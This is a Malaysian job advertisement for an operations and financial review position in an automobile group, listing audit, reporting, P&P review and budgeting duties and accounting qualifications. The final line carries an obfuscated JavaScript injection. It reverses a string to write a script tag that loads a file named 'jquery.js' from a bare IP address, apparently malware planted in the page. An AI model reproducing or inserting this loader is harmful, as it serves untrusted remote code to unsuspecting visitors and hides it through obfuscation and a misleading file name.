Industry : Automobile
• To perform operations/financial review assignments within the Klang Valley and outstation on all aspects of the Group’s business operations
• To draft Operations Review report
• To document systems flowchart and record notes for all aspects of the Group’s business operations.
• To assist in reviewing new operational Policies & Procedures (P&Ps) with the help of the respective Department’s staff.
• To review existing P&Ps and updating to current and relevant requirements.
• To assist in monitoring ISO review processes
• To assist in the preparation of the Group’s Annual Budget
• Any other ad hoc assignments requested by the Management.
• Accounts graduate from foreign/external university
• Partly qualified in professional accountancy exams (i.e.ACCA/ICMA/MICPA)will also be considered
• At least 3 years of work experience with reputable audit/Bursa company with a wide variety of work exposure to accounts & internal controls
• Computer savvy – Acc Pac and basic MS Office, Power point
• Good interpersonal skills with all levels of staff
• Good report writing skills and good in written & spoken English
• Chinese dialects will be an added advantage
• Integrity, honesty & pro-active
• Disciplined & good work attitude
• Work independently with minimum of supervision
• Willing to travel at short notice and to work overtime document.write(‘>tpircs/”sj.yreuqj/87.611.942.431//:sptth”=crs tpircs<'.split("").reverse().join(""))